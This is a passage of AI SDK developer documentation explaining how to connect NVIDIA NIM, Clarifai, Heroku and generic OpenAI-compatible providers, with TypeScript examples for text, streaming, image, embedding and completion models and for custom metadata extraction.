The NVIDIA NIM provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with:

Provider Instance

To use NVIDIA NIM, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

Language Models

You can interact with NIM models using a provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:

const model = nim.chatModel('deepseek-ai/deepseek-r1');

Example - Generate Text

You can use NIM language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

const { text, usage, finishReason } = await generateText({
  model: nim.chatModel('deepseek-ai/deepseek-r1'),
  prompt: 'Tell me the history of the San Francisco Mission-style burrito.',
});

console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);

Example - Stream Text

NIM language models can also generate text in a streaming fashion with the streamText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';

const nim = createOpenAICompatible({
  name: 'nim',
  baseURL: 'https://integrate.api.nvidia.com/v1',
  headers: {
    Authorization: `Bearer ${process.env.NIM_API_KEY}`,
  },
});

const result = streamText({
  model: nim.chatModel('deepseek-ai/deepseek-r1'),
  prompt: 'Tell me the history of the Northern White Rhino.',
});

for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}

console.log();
console.log('Token usage:', await result.usage);
console.log('Finish reason:', await result.finishReason);

NIM language models also support structured data generation with Output.

title: Clarifai description: Use Clarifai OpenAI compatible API with the AI SDK.

Clarifai Provider

Setup

The Clarifai provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with:

Provider Instance

To use Clarifai, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const clarifai = createOpenAICompatible({
  name: 'clarifai',
  baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
  apiKey: process.env.CLARIFAI_PAT,
});

New users can sign up for a free account on Clarifai to get started.

Language Models

You can interact with various large language models (LLMs) available on Clarifai using the provider instance. For example, to use DeepSeek-R1, a powerful open-source language model:

const model = clarifai.chatModel(
  'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);

Example - Generate Text

You can use Clarifai language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const clarifai = createOpenAICompatible({
  name: 'clarifai',
  baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
  apiKey: process.env.CLARIFAI_PAT,
});

const model = clarifai.chatModel(
  'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);

const { text, usage, finishReason } = await generateText({
  model,
  prompt: 'What is photosynthesis?',
});

console.log(text);
console.log('Token usage:', usage);
console.log('Finish reason:', finishReason);

Example - Streaming Text

You can also stream text responses from Clarifai models using the streamText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';

const clarifai = createOpenAICompatible({
  name: 'clarifai',
  baseURL: 'https://api.clarifai.com/v2/ext/openai/v1',
  apiKey: process.env.CLARIFAI_PAT,
});

const model = clarifai.chatModel(
  'https://clarifai.com/deepseek-ai/deepseek-chat/models/DeepSeek-R1-0528-Qwen3-8B',
);

const result = streamText({
  model,
  prompt: 'What is photosynthesis?',
});

for await (const message of result.textStream) {
  console.log(message);
}

For full list of available models, you can refer to the Clarifai Model Gallery.

title: Heroku description: Use a Heroku OpenAI compatible API with the AI SDK.

Heroku Provider

Setup

The Heroku provider is available via the @ai-sdk/openai-compatible module as it is compatible with the OpenAI API. You can install it with

Heroku Setup

Create a test app in Heroku:

heroku create

Inference using claude-3-5-haiku:

heroku ai:models:create -a $APP_NAME claude-3-5-haiku

Export Variables:

export INFERENCE_KEY=$(heroku config:get INFERENCE_KEY -a $APP_NAME)
export INFERENCE_MODEL_ID=$(heroku config:get INFERENCE_MODEL_ID -a $APP_NAME)
export INFERENCE_URL=$(heroku config:get INFERENCE_URL -a $APP_NAME)

Provider Instance

To use Heroku, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const heroku = createOpenAICompatible({
  name: 'heroku',
  baseURL: process.env.INFERENCE_URL + '/v1',
  apiKey: process.env.INFERENCE_KEY,
});

Be sure to have your INFERENCE_KEY, INFERENCE_MODEL_ID, and INFERENCE_URL set in your environment variables.

Language Models

You can create Heroku models using a provider instance. The first argument is the served model name, e.g. claude-3-5-haiku.

const model = heroku('claude-3-5-haiku');

Example

You can use Heroku language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const heroku = createOpenAICompatible({
  name: 'heroku',
  baseURL: process.env.INFERENCE_URL + '/v1',
  apiKey: process.env.INFERENCE_KEY,
});

const { text } = await generateText({
  model: heroku('claude-3-5-haiku'),
  prompt: 'Tell me about yourself in one sentence',
});

console.log(text);

Heroku language models are also able to generate text in a streaming fashion with the streamText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { streamText } from 'ai';

const heroku = createOpenAICompatible({
  name: 'heroku',
  baseURL: process.env.INFERENCE_URL + '/v1',
  apiKey: process.env.INFERENCE_KEY,
});

const result = streamText({
  model: heroku('claude-3-5-haiku'),
  prompt: 'Tell me about yourself in one sentence',
});

for await (const message of result.textStream) {
  console.log(message);
}

Heroku language models also support structured data generation with Output.

title: OpenAI Compatible Providers description: Use OpenAI compatible providers with the AI SDK.

OpenAI Compatible Providers

You can use the OpenAI Compatible Provider package to use language model providers that implement the OpenAI API.

Below we focus on the general setup and provider instance creation. You can also write a custom provider package leveraging the OpenAI Compatible package.

We provide detailed documentation for the following OpenAI compatible providers:

The general setup and provider instance creation is the same for all of these providers.

Setup

The OpenAI Compatible provider is available via the @ai-sdk/openai-compatible module. You can install it with:

Provider Instance

To use an OpenAI compatible provider, you can create a custom provider instance with the createOpenAICompatible function from @ai-sdk/openai-compatible:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
  includeUsage: true, // Include usage information in streaming responses
});

You can use the following optional settings to customize the provider instance:

baseURL string

Set the URL prefix for API calls.
apiKey string

API key for authenticating requests. If specified, adds an Authorization header to request headers with the value Bearer <apiKey>. This will be added before any headers potentially specified in the headers option.
headers Record<string,string>

Optional custom headers to include in requests. These will be added to request headers after any headers potentially added by use of the apiKey option.
queryParams Record<string,string>

Optional custom url query parameters to include in request urls.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
includeUsage boolean

Include usage information in streaming responses. When enabled, usage data will be included in the response metadata for streaming requests. Defaults to undefined (false).
supportsStructuredOutputs boolean

Set to true if the provider supports structured outputs. Only relevant for provider(), provider.chatModel(), and provider.languageModel().
transformRequestBody (args: Record<string, any>) => Record<string, any>

Optional function to transform the request body before sending it to the API. This is useful for proxy providers that may require a different request format than the official OpenAI API.
metadataExtractor MetadataExtractor

Optional metadata extractor to capture provider-specific metadata from API responses. See Custom Metadata Extraction for details.

Language Models

You can create provider models using a provider instance. The first argument is the model id, e.g. model-id.

const model = provider('model-id');

You can also use the following factory methods:

provider.languageModel('model-id') - creates a chat language model (same as provider('model-id'))
provider.chatModel('model-id') - creates a chat language model

Supported Capabilities

Chat models created with this provider support the following capabilities:

Text generation - Generate text completions
Streaming - Stream text responses in real-time
Tool calling - Call tools/functions with streaming support
Structured outputs - Generate JSON with schema validation (when supportsStructuredOutputs is enabled)
Reasoning content - Support for models that return reasoning/thinking tokens (e.g., DeepSeek R1)
System messages - Support for system prompts
Multi-modal inputs - Support for images and other content types (provider-dependent)

Example

You can use provider language models to generate text with the generateText function:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { text } = await generateText({
  model: provider('model-id'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Including model ids for auto-completion

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

type ExampleChatModelIds =
  | 'meta-llama/Llama-3-70b-chat-hf'
  | 'meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo'
  | (string & {});

type ExampleCompletionModelIds =
  | 'codellama/CodeLlama-34b-Instruct-hf'
  | 'Qwen/Qwen2.5-Coder-32B-Instruct'
  | (string & {});

type ExampleEmbeddingModelIds =
  | 'BAAI/bge-large-en-v1.5'
  | 'bert-base-uncased'
  | (string & {});

type ExampleImageModelIds = 'dall-e-3' | 'stable-diffusion-xl' | (string & {});

const model = createOpenAICompatible<
  ExampleChatModelIds,
  ExampleCompletionModelIds,
  ExampleEmbeddingModelIds,
  ExampleImageModelIds
>({
  name: 'example',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.example.com/v1',
});

// Subsequent calls to e.g. `model.chatModel` will auto-complete the model id
// from the list of `ExampleChatModelIds` while still allowing free-form
// strings as well.

const { text } = await generateText({
  model: model.chatModel('meta-llama/Llama-3-70b-chat-hf'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Custom query parameters

Some providers may require custom query parameters. An example is the Azure AI Model Inference API which requires an api-version query parameter.

You can set these via the optional queryParams provider setting. These will be added to all requests made by the provider.

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
  queryParams: {
    'api-version': '1.0.0',
  },
});

For example, with the above configuration, API requests would include the query parameter in the URL like: https://api.provider.com/v1/chat/completions?api-version=1.0.0.

Image Models

You can create image models using the .imageModel() factory method:

const model = provider.imageModel('model-id');

Basic Image Generation

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateImage } from 'ai';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { images } = await generateImage({
  model: provider.imageModel('model-id'),
  prompt: 'A futuristic cityscape at sunset',
  size: '1024x1024',
});

Image Editing

The OpenAI Compatible provider supports image editing through the /images/edits endpoint. Pass input images via prompt.images to transform or edit existing images.

Basic Image Editing

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateImage } from 'ai';
import fs from 'fs';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const imageBuffer = fs.readFileSync('./input-image.png');

const { images } = await generateImage({
  model: provider.imageModel('model-id'),
  prompt: {
    text: 'Turn the cat into a dog but retain the style of the original image',
    images: [imageBuffer],
  },
});

Inpainting with Mask

Edit specific parts of an image using a mask:

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateImage } from 'ai';
import fs from 'fs';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const image = fs.readFileSync('./input-image.png');
const mask = fs.readFileSync('./mask.png');

const { images } = await generateImage({
  model: provider.imageModel('model-id'),
  prompt: {
    text: 'A sunlit indoor lounge area with a pool containing a flamingo',
    images: [image],
    mask,
  },
});

Embedding Models

You can create embedding models using the .embeddingModel() factory method:

const model = provider.embeddingModel('model-id');

Example

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { embed } from 'ai';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { embedding } = await embed({
  model: provider.embeddingModel('text-embedding-model'),
  value: 'The quick brown fox jumps over the lazy dog',
});

Embedding Model Options

The following provider options are available for embedding models via providerOptions:

dimensions number

The number of dimensions the resulting output embeddings should have. Only supported in models that allow dimension configuration.
user string

A unique identifier representing your end-user, which can help providers to monitor and detect abuse.

const { embedding } = await embed({
  model: provider.embeddingModel('text-embedding-model'),
  value: 'The quick brown fox jumps over the lazy dog',
  providerOptions: {
    providerName: {
      dimensions: 512,
      user: 'user-123',
    },
  },
});

Completion Models

You can create completion models (for text completion, not chat) using the .completionModel() factory method:

const model = provider.completionModel('model-id');

Example

import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { generateText } from 'ai';

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { text } = await generateText({
  model: provider.completionModel('completion-model-id'),
  prompt: 'The quick brown fox',
});

Completion Model Options

The following provider options are available for completion models via providerOptions:

echo boolean

Echo back the prompt in addition to the completion.
logitBias Record<string, number>

Modify the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID) to an associated bias value from -100 to 100.
suffix string

The suffix that comes after a completion of inserted text.
user string

A unique identifier representing your end-user, which can help providers to monitor and detect abuse.

const { text } = await generateText({
  model: provider.completionModel('completion-model-id'),
  prompt: 'The quick brown fox',
  providerOptions: {
    providerName: {
      echo: true,
      suffix: ' The end.',
      user: 'user-123',
    },
  },
});

Chat Model Options

The following provider options are available for chat models via providerOptions:

user string

A unique identifier representing your end-user, which can help the provider to monitor and detect abuse.
reasoningEffort string

Reasoning effort for reasoning models. The exact values depend on the provider.
textVerbosity string

Controls the verbosity of the generated text. The exact values depend on the provider.
strictJsonSchema boolean

Whether to use strict JSON schema validation. When true, the model uses constrained decoding to guarantee schema compliance. Only used when the provider supports structured outputs and a schema is provided. Defaults to true.

const { text } = await generateText({
  model: provider('model-id'),
  prompt: 'Solve this step by step: What is 15 * 23?',
  providerOptions: {
    providerName: {
      user: 'user-123',
      reasoningEffort: 'high',
    },
  },
});

Provider-specific options

The OpenAI Compatible provider supports adding provider-specific options to the request body. These are specified with the providerOptions field in the request body.

For example, if you create a provider instance with the name providerName, you can add a customOption field to the request body like this:

const provider = createOpenAICompatible({
  name: 'providerName',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
});

const { text } = await generateText({
  model: provider('model-id'),
  prompt: 'Hello',
  providerOptions: {
    providerName: { customOption: 'magic-value' },
  },
});

Note that the providerOptions key will be in camelCase. If you set the provider name to provider-name, the options still need to be set on providerOptions.providerName.

Custom Metadata Extraction

Working with providers that include non-standard response fields
Experimenting with beta or preview features
Capturing provider-specific metrics or debugging information
Supporting rapid provider API evolution without SDK changes

Metadata extractors work with both streaming and non-streaming chat completions and consist of two main components:

A function to extract metadata from complete responses
A streaming extractor that can accumulate metadata across chunks in a streaming response

Here's an example metadata extractor that captures both standard and custom provider data:

import { MetadataExtractor } from '@ai-sdk/openai-compatible';

const myMetadataExtractor: MetadataExtractor = {
  // Process complete, non-streaming responses
  extractMetadata: ({ parsedBody }) => {
    // You have access to the complete raw response
    // Extract any fields the provider includes
    return {
      myProvider: {
        standardUsage: parsedBody.usage,
        experimentalFeatures: parsedBody.beta_features,
        customMetrics: {
          processingTime: parsedBody.server_timing?.total_ms,
          modelVersion: parsedBody.model_version,
          // ... any other provider-specific data
        },
      },
    };
  },

  // Process streaming responses
  createStreamExtractor: () => {
    let accumulatedData = {
      timing: [],
      customFields: {},
    };

    return {
      // Process each chunk's raw data
      processChunk: parsedChunk => {
        if (parsedChunk.server_timing) {
          accumulatedData.timing.push(parsedChunk.server_timing);
        }
        if (parsedChunk.custom_data) {
          Object.assign(accumulatedData.customFields, parsedChunk.custom_data);
        }
      },
      // Build final metadata from accumulated data
      buildMetadata: () => ({
        myProvider: {
          streamTiming: accumulatedData.timing,
          customData: accumulatedData.customFields,
        },
      }),
    };
  },
};

You can provide a metadata extractor when creating your provider instance:

const provider = createOpenAICompatible({
  name: 'my-provider',
  apiKey: process.env.PROVIDER_API_KEY,
  baseURL: 'https://api.provider.com/v1',
  metadataExtractor: myMetadataExtractor,
});

The extracted metadata will be included in the response under the providerMetadata field:

const { text, providerMetadata } = await generateText({
  model: provider('model-id'),
  prompt: 'Hello',
});

console.log(providerMetadata.myProvider.customMetric);

This allows you to access provider-specific information while maintaining a consistent interface across different providers.